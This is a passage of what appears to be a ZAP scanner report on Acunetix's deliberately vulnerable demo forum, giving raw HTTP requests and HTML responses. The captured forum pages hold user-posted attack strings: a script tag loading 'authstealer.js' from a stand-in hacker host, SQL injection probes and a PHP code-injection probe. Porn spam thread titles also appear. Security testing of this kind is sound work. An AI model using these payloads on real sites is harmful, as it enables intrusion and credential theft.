help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 332 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 2961 |
| Response Body - size: 2,961 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'ZAP'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 10037 |
| Response Body - size: 10,037 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>1</td><td>myrnaou3</td><td>3/14/2022 7:22:30 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3101 |
| Response Body - size: 3,101 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Weather</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Weather </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>301 Moved Permanently</a></div></td><td>1</td><td>WinstonVup</td><td>3/14/2022 5:30:18 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 4017 |
| Response Body - size: 4,017 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Miscellaneous</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Miscellaneous </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>ÑайÑ</a></div></td><td>1</td><td>Jamesaidem</td><td>3/13/2022 10:17:25 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>Testing</a></div></td><td>1</td><td> </td><td>3/13/2022 3:11:02 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'><script>doSomethingEvil();</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:31:45 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'><script src=http://hackersite.com/authstealer.js> </script>.</a></div></td><td>1</td><td> </td><td>3/13/2022 3:33:39 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'><script>alert('Hello')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:05 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'><script>alert('BELLO')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:42 PM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 14602 |
| Response Body - size: 14,602 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div 